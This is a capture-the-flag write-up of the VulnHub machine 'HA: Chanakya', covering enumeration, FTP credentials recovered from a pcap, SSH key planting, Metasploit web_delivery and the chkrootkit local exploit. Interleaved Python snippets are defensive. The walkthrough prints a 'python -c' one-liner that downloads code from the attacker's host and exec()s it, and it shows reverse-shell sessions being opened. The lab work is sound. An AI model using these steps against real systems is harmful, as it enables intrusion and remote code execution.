VulnHub machine penetration test [HA-Chanakya]

Name: HA: Chanakya
Release date: 9 November 2019

Download:

  • Download: https://drive.google.com/file/d/19IyCAe91_EeELwjTFqoZ4_fwHKURNBD4/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/ha/chanakya.zip
  • Download (Torrent): https://download.vulnhub.com/ha/chanakya.zip.torrent

Description:

The mastermind who destroyed the kingdom is back, and this time he has created a puzzle that will make you scratch your head! It is time to face Chanakya.
Can you solve this boot-to-root and prove yourself the wiser?
Enumeration is the key!!!!

Level: Intermediate

Task: Enumerate the target machine and gain root access.

Information gathering

As usual, start with nmap.

root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.130
Host is up (0.00034s latency).
MAC Address: 00:0C:29:BB:CA:D3 (VMware)
root@kali:~# nmap -A -sV -Pn -T4 -v --script=vuln 192.168.142.130
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.0.0 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
|_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283

Next, a directory scan with dirb.

root@kali:~# dirb http://192.168.142.130/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 22:27:13 2019
URL_BASE: http://192.168.142.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.142.130/ ----
==> DIRECTORY: http://192.168.142.130/assets/
==> DIRECTORY: http://192.168.142.130/images/
+ http://192.168.142.130/index.html (CODE:200|SIZE:2382)
+ http://192.168.142.130/server-status (CODE:403|SIZE:280)

root@kali:~# dirb http://192.168.142.130/ -X .txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 22:28:34 2019
URL_BASE: http://192.168.142.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.142.130/ ----
+ http://192.168.142.130/abuse.txt (CODE:200|SIZE:14)

Visiting that txt file reveals the following content:

nfubxn.cpncat

Decoding it as ROT13 (rot13.com does the job) gives ashoka.pcapng. Visit http://192.168.142.130/ashoka.pcapng, download the file, and open it in Wireshark.

With the capture open in Wireshark, follow the TCP stream of the FTP traffic; it yields the FTP username ashoka and password kautilya.

220 pyftpdlib based ftpd ready.
USER ashoka
331 Username ok, send password.
PASS kautilya
230 Login successful.
SYST
215 UNIX Type: L8
FEAT
211-Features supported:
EPRT
EPSV
MDTM
MLST type*;perm*;size*;modify*;unique*;unix.mode;unix.uid;unix.gid;
REST STREAM
SIZE
TVFS
UTF8
211 End FEAT.
OPTS UTF8 ON
501 Invalid argument.
PWD
257 "/" is the current directory.
TYPE A
200 Type set to: ASCII.
PASV
227 Entering passive mode (192,168,1,101,177,201).
MLSD
150 File status okay. About to open data connection.
226 Transfer complete.
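
The weak point here is the protocol rather than the puzzle: FTP sends USER and PASS in cleartext, so anyone holding the capture (which was sitting in the web root) gets the account. As an added example that is not part of the original walkthrough, the following Python scans an FTP control-channel transcript like the one above and reports which accounts authenticated in cleartext, so a defender knows which passwords to rotate. The embedded transcript is a constructed excerpt of the exchange above plus an invented failed attempt, and the function names are my own.

```python
# Added example: find accounts whose FTP credentials crossed the wire in
# cleartext. Input is a plaintext FTP control-channel transcript such as the
# Wireshark "Follow TCP Stream" output from the walkthrough.

# Constructed sample: a trimmed copy of the control channel from the pcap,
# followed by an invented second, failed login attempt for illustration.
SAMPLE_FTP_STREAM = """220 pyftpdlib based ftpd ready.
USER ashoka
331 Username ok, send password.
PASS kautilya
230 Login successful.
SYST
215 UNIX Type: L8
USER guest
331 Username ok, send password.
PASS guest
530 Authentication failed.
"""


def extract_ftp_logins(stream):
    """Return [(username, succeeded)] for every USER/PASS pair in `stream`.

    The password itself is deliberately not returned: a defender needs to
    know which account to rotate, not to echo the secret into another log.
    A login attempt is complete once the server answers the PASS command
    with a 3-digit reply code (230 = logged in, anything else = refused).
    """
    logins = []
    user = None
    pass_sent = False
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            user, pass_sent = arg, False
        elif verb == "PASS":
            pass_sent = user is not None
        elif line[:3].isdigit() and pass_sent:
            logins.append((user, line.startswith("230")))
            user, pass_sent = None, False
    return logins


def exposed_accounts(stream):
    """Usernames that successfully authenticated in cleartext (rotate these)."""
    return sorted({u for u, ok in extract_ftp_logins(stream) if ok})
```

Run it over the text of a followed stream (or a `tshark -z follow,tcp,ascii,...` dump) and feed `exposed_accounts()` to whatever ticketing you use; the same shape of check works for any cleartext protocol with a request/reply pair.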

Now that we have FTP credentials, log in to the FTP server. After logging in, run ls to look around: we are in the FTP root, and the dotfiles listed (.bash_history, .bashrc, .profile) show that this is ashoka's home directory. So the plan is to get SSH access by planting an SSH key here. For that, create a directory named ".ssh", change into the newly created directory, and then go back to the local terminal.

root@kali:~# ftp 192.168.142.130
Connected to 192.168.142.130.
220 pyftpdlib based ftpd ready.
Name (192.168.142.130:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 ashoka ashoka 1 Nov 05 15:57 .bash_history
-rw-r--r-- 1 ashoka ashoka 220 Nov 05 14:05 .bash_logout
-rw-r--r-- 1 ashoka ashoka 3771 Nov 05 14:05 .bashrc
drwx------ 2 ashoka ashoka 4096 Nov 05 14:18 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 14:26 .local
-rw-r--r-- 1 ashoka ashoka 807 Nov 05 14:05 .profile
226 Transfer complete.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.

Now it is time to generate SSH keys. Create a key pair with ssh-keygen; the passphrase entered was "123", but it can be anything you choose, just keep it easy to remember. After creating the keys, go into the .ssh directory of the local shell, where the public key "id_rsa.pub" sits. This key needs to be uploaded to the FTP server, so copy the contents of id_rsa.pub into a file named authorized_keys.

root@kali:~/.ssh# ls
id_rsa id_rsa.pub known_hosts
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
root@kali:~/.ssh# ls
authorized_keys id_rsa id_rsa.pub known_hosts
root@kali:~/.ssh# cat id_rsa.pub
ssh-rsa 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 root@kali
root@kali:~/.ssh# cat authorized_keys
ssh-rsa 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 root@kali
root@kali:~/.ssh# ls
authorized_keys id_rsa id_rsa.pub known_hosts

Use the put command to transfer the file to the target machine.

ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (14.5113 MB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 563 Dec 16 05:30 authorized_keys
226 Transfer complete.
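
What made the key planting possible is that the FTP root is ashoka's home directory and the daemon writes into it (the uploaded authorized_keys shows up owned by root:root in the listing, which suggests pyftpdlib itself runs as root). The defender's counterpart is to audit authorized_keys files against a list of expected key fingerprints, so a key that nobody issued stands out. The following Python is an added example, not code from the original walkthrough: the sample file content is constructed (a syntactically valid ssh-ed25519 entry with a made-up key body, carrying the same "root@kali" comment as above), and the function names are my own.

```python
import base64
import hashlib
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def _ssh_string(data):
    """SSH wire-format string: big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


# Constructed sample authorized_keys content: a syntactically valid
# ssh-ed25519 entry whose 32-byte key body is just 0x00..0x1f, so this is
# NOT a real key. The comment matches the one uploaded in the walkthrough.
_FAKE_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
SAMPLE_AUTHORIZED_KEYS = (
    "# keys managed by config management\n"
    "ssh-ed25519 " + base64.b64encode(_FAKE_BLOB).decode() + " root@kali\n"
)
# Same blob, but labelled with the wrong type in the text field (constructed).
SAMPLE_MISMATCHED_LINE = "ssh-rsa " + base64.b64encode(_FAKE_BLOB).decode() + " ci@build\n"


def fingerprint(blob):
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(blob)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_key_type(blob):
    """The key-type string that leads every SSH public-key blob, or None."""
    if len(blob) < 4:
        return None
    (length,) = struct.unpack(">I", blob[:4])
    body = blob[4:4 + length]
    return body.decode("ascii", "replace") if len(body) == length else None


def audit_authorized_keys(text, trusted_fingerprints):
    """Parse an authorized_keys file and return one dict per key entry.

    Each dict carries the line number, key type, fingerprint, comment, any
    leading options (from=, command=, ...) and a list of `reasons` the entry
    deserves a look: a malformed line, a type field that disagrees with the
    blob, or a fingerprint not in `trusted_fingerprints`.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            findings.append({"line": lineno, "reasons": ["unparseable entry"]})
            continue
        key_type, b64 = tokens[idx], tokens[idx + 1]
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            findings.append({"line": lineno, "type": key_type,
                             "reasons": ["key blob is not valid base64"]})
            continue
        fp = fingerprint(blob)
        reasons = []
        if blob_key_type(blob) != key_type:
            reasons.append("type field does not match key blob")
        if fp not in trusted_fingerprints:
            reasons.append("fingerprint not in trusted set")
        findings.append({
            "line": lineno, "type": key_type, "fingerprint": fp,
            "comment": " ".join(tokens[idx + 2:]), "options": tokens[:idx],
            "reasons": reasons,
        })
    return findings
```

The fingerprints it computes are the same ones `ssh-keygen -lf authorized_keys` prints, so the trusted set can be built from the keys you actually issued. Beyond the file contents, the listing above is its own finding: a service account's home directory that a network daemon can write to is equivalent to handing out SSH access with the FTP password.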

Now connect to the target with ssh. Because the authorized key was placed earlier, the login succeeds and we get a shell as the user ashoka. After some enumeration, there is a log file under /tmp. Reading it with cat, it looks like the results log of a chkrootkit run, which hints that chkrootkit might be the way to escalate privileges on this machine.

root@kali:~# ssh ashoka@192.168.142.130
The authenticity of host '192.168.142.130 (192.168.142.130)' can't be established.
ECDSA key fingerprint is SHA256:cuEf1JsbferQL5tQ/iVC9mGMCIALDE5/sX/OJt5LgPQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.130' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
Enter passphrase for key '/root/.ssh/id_rsa':
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Tue Nov 5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
ashoka@ubuntu:~$ whoami
ashoka
ashoka@ubuntu:~$ cat /tmp/logs
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not found
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not found
Checking `sshd'... not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... INFECTED
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/lib/modules/4.15.0-20-generic/vdso/.build-id
/lib/modules/4.15.0-20-generic/vdso/.build-id
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... Warning: /sbin/init INFECTED
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for common ssh-scanners default files... nothing found
Searching for suspect PHP files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... not tested: can't exec
Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
Checking `OSX_RSPLUG'... not infected
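
A chkrootkit log is long and mostly "not infected", so the lines that matter get lost: the two INFECTED hits (tcpd, and /sbin/init from the Suckit search) and the many checks that were silently skipped because their helper binaries (strings-static, ifpromisc, chkwtmp, ...) could not be executed. The following Python is an added example, not the walkthrough's own code, that parses a chkrootkit report into those buckets; the embedded log is a constructed excerpt of /tmp/logs above, and the function name is my own.

```python
import re

# Constructed excerpt of a chkrootkit run, shaped like /tmp/logs above
# (the real file is much longer; these lines cover every result form).
SAMPLE_CHKROOTKIT_LOG = """ROOTDIR is `/'
Checking `basename'... not infected
Checking `biff'... not found
Checking `inetd'... not tested
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `tcpd'... INFECTED
Searching for sniffer's logs, it may take a while... nothing found
Searching for suspicious files and dirs, it may take a while...
/lib/modules/4.15.0-20-generic/vdso/.build-id
Searching for Suckit rootkit... Warning: /sbin/init INFECTED
Checking `aliens'... no suspect files
Checking `lkm'... not tested: can't exec
Checking `chkutmp'... not tested: can't exec ./chkutmp
"""

# Matches "Checking `name'... result" and "Searching for name... result".
RESULT_RE = re.compile(r"^(?:Checking|Searching for) `?(.+?)'?\.\.\.\s?(.*)$")
CLEAN_RESULTS = ("not infected", "nothing found", "no suspect files")


def summarize_chkrootkit(log):
    """Bucket every chkrootkit result line.

    Keys: infected [(name, result)], not_tested, not_found, clean,
    suspicious_paths (bare paths printed after the 'suspicious files' search)
    and other (anything unrecognised). 'not_tested' is the bucket people
    overlook: each of those checks ran without its helper binary, so it
    provided no coverage at all."""
    buckets = {k: [] for k in ("infected", "not_tested", "not_found",
                               "clean", "suspicious_paths", "other")}
    for raw in log.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = RESULT_RE.match(line)
        if not m:
            target = buckets["suspicious_paths"] if line.startswith("/") else buckets["other"]
            target.append(line)
            continue
        name = m.group(1).replace(", it may take a while", "")
        result = m.group(2)
        if not result:
            continue  # header line; its findings follow as bare paths
        if "INFECTED" in result:
            buckets["infected"].append((name, result))
        elif "not tested" in result:
            buckets["not_tested"].append(name)
        elif result == "not found":
            buckets["not_found"].append(name)
        elif result in CLEAN_RESULTS:
            buckets["clean"].append(name)
        else:
            buckets["other"].append(line)
    return buckets
```

On a real host the interesting question is not only what the INFECTED lines say but whether this log is trustworthy at all: a report that anyone can read under /tmp, produced by a tool whose helper binaries are missing, says as much about how the scan is deployed as about the system it scanned.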

Privilege escalation

Now, to escalate privileges on the target, we need a meterpreter session on it and then use Metasploit to get root. Use the web_delivery module to deliver meterpreter: select it with the use command and set LHOST, which is the IP address of the listening machine (Kali Linux). Then type exploit. This produces a one-line script which, when run on the target, gives us a meterpreter session.

root@kali:~# msfdb run
[+] Starting database

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v5.0.63-dev ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.142.128
LHOST => 192.168.142.128
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.142.128:4444
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/iG1jsBgk9ZBOAY
[*] Local IP: http://192.168.142.128:8080/iG1jsBgk9ZBOAY
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());"

Copy the command generated by the module and run it in the ssh session obtained earlier (the python one-liner below).

ashoka@ubuntu:~$ python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());"
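
That one-liner is worth recognising on the defender's side: a `python -c` that downloads code over HTTP and hands it to exec() never touches disk, and the `{2:'',3:'.request'}` trick that makes it work on both Python 2 and 3 is characteristic of web_delivery. As an added example that is not part of the original walkthrough, the following Python flags such command lines in recorded process executions; the sample lines are constructed (the second one is the command above, the others are benign look-alikes) and the function names are my own.

```python
import re

# Constructed sample of recorded process command lines (execve argv joined
# by spaces, as an auditd or EDR pipeline would store them). Entry 1 is the
# web_delivery one-liner from the session above; the others are benign.
SAMPLE_CMDLINES = [
    "python3 /usr/bin/apt-listchanges --apt",
    "python -c \"import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],"
    "fromlist=('urlopen',));r=u.urlopen('http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());\"",
    "python3 -c 'print(1+1)'",
    "python3 -c 'import urllib.request;print(urllib.request.urlopen(\"http://127.0.0.1:9090/health\").status)'",
]

# `python -c <code>`, tolerating a version suffix and other flags before -c.
PY_INLINE_RE = re.compile(r"\bpython[0-9.]*\s+(?:-[A-Za-z]+\s+)*-c\s+(.+)$")
# First URL handed to urlopen(...), so the alert says where the payload came from.
URL_RE = re.compile(r"urlopen\(\s*['\"](https?://[^'\"]+)['\"]")
FETCHERS = ("urlopen", "urllib", "requests.get", "http.client")
EXECUTORS = ("exec(", "eval(")
VERSION_AGNOSTIC_IMPORT = ("__import__('urllib'+{2:''", '__import__("urllib"+{2:""')


def detect_python_stager(cmdline):
    """Return {'reasons': [...], 'url': ...} if `cmdline` is an inline Python
    command that fetches code over HTTP and executes it in memory; else None."""
    m = PY_INLINE_RE.search(cmdline)
    if not m:
        return None
    code = m.group(1)
    reasons = []
    if any(f in code for f in FETCHERS) and any(e in code for e in EXECUTORS):
        reasons.append("downloads content over HTTP and passes it to exec()/eval()")
    if any(idiom in code for idiom in VERSION_AGNOSTIC_IMPORT):
        reasons.append("python2/3-agnostic urllib import idiom used by web_delivery")
    if not reasons:
        return None
    url = URL_RE.search(code)
    return {"reasons": reasons, "url": url.group(1) if url else None}


def scan_cmdlines(lines):
    """Run the detector over a list of command lines; returns [(index, hit)]."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect_python_stager(line)
        if hit:
            hits.append((i, hit))
    return hits
```

The health-check line is there on purpose: fetching over HTTP alone is normal, so the rule only fires when the fetched content is also executed, which keeps the detector quiet on monitoring scripts while still catching hand-written variants that drop the web_delivery idiom.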

This gives us the session we need. Next, use Metasploit's built-in chkrootkit exploit module, which can give us a root shell on the target. Select the session and set a port for the new session. After typing exploit, the module runs and, through the port just set, hands us another shell. To turn it into a usable shell, run the python one-liner to spawn a TTY.

msf5 exploit(multi/script/web_delivery) > 
[*] 192.168.142.130 web_delivery - Delivering Payload (454) bytes
[*] Sending stage (53755 bytes) to 192.168.142.130
[*] Meterpreter session 3 opened (192.168.142.128:4444 -> 192.168.142.130:38970) at 2019-12-16 01:06:52 -0500

msf5 exploit(multi/script/web_delivery) >
msf5 exploit(multi/script/web_delivery) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set session 3
session => 3
msf5 exploit(unix/local/chkrootkit) > set lport 8888
lport => 8888
msf5 exploit(unix/local/chkrootkit) > exploit

[*] Started reverse TCP double handler on 192.168.142.128:8888
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XMnVavzOqVIfxgY5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "XMnVavzOqVIfxgY5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.142.128:8888 -> 192.168.142.130:44238) at 2019-12-16 01:09:28 -0500
whoami
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BGwiPjx0EW1uplK3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "BGwiPjx0EW1uplK3\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.142.128:8888 -> 192.168.142.130:44242) at 2019-12-16 01:10:28 -0500
[!] Tried to delete /tmp/update, unknown result
root
python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
whoami
root
# ls
ls
final.txt
# cat final.txt
cat final.txt

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
#
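
What the module is waiting for is visible in its own output: it drops a file at /tmp/update and then relies on a root cron job running chkrootkit. As an added example, not part of the original walkthrough, the following Python checks a host for both halves of that condition, a /tmp/update file (with owner and mode) and active cron entries that invoke chkrootkit. The demo runs against a scratch directory with a constructed crontab line, since the box's real cron entry is not shown above, and the function names are my own.

```python
import os
import stat
import tempfile


def tmp_update_indicator(tmp_dir="/tmp"):
    """Describe <tmp_dir>/update if it exists (None otherwise).

    That path is where the chkrootkit local exploit module above reported
    writing its payload; a fresh, executable file there is worth a look."""
    path = os.path.join(tmp_dir, "update")
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    return {
        "path": path,
        "uid": st.st_uid,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "executable": bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
        "is_symlink": stat.S_ISLNK(st.st_mode),
    }


def chkrootkit_cron_entries(crontab_text):
    """Active (non-comment) cron lines that invoke chkrootkit.

    Feed it the contents of /etc/crontab, files under /etc/cron.d, or the
    output of `crontab -l` run as root."""
    entries = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "chkrootkit" in line:
            entries.append(line)
    return entries


def assess(tmp_dir, crontab_text):
    """Combine both signals. 'exposed' is True when a scheduled chkrootkit
    run coincides with a /tmp/update file, which is the state the module
    waits for."""
    cron = chkrootkit_cron_entries(crontab_text)
    indicator = tmp_update_indicator(tmp_dir)
    return {
        "cron_runs_chkrootkit": bool(cron),
        "cron_entries": cron,
        "tmp_update": indicator,
        "exposed": bool(cron) and indicator is not None,
    }


# Constructed crontab content for the demo; the real entry on the box is
# not shown in the walkthrough.
DEMO_CRONTAB = "# m h dom mon dow user command\n*/1 * * * * root /usr/sbin/chkrootkit > /tmp/logs\n"


def demo_exposed():
    """Run assess() against a scratch directory holding an executable 'update'."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "update")
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # harmless stand-in for a dropped file
        os.chmod(path, 0o755)
        return assess(d, DEMO_CRONTAB)


def demo_clean():
    """Same check on an empty scratch directory with no chkrootkit cron job."""
    with tempfile.TemporaryDirectory() as d:
        return assess(d, "# nothing scheduled\n")
```

On a production host you would call `assess("/tmp", open("/etc/crontab").read())` (plus the cron.d files) from a periodic job; the cron half is the one to fix, since a scanner that root runs every minute from a world-writable working state is the enabling condition, and the /tmp/update half is the early warning that someone has already started using it.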

There is a text file final.txt; open it to get the final flag. That concludes the challenge. Nicely done.

Sorry, this time I still have not found that certain Greek master's fool-proof one-click script for the whole box. I am so sorry about this… It's a pity…

The end, to be continued…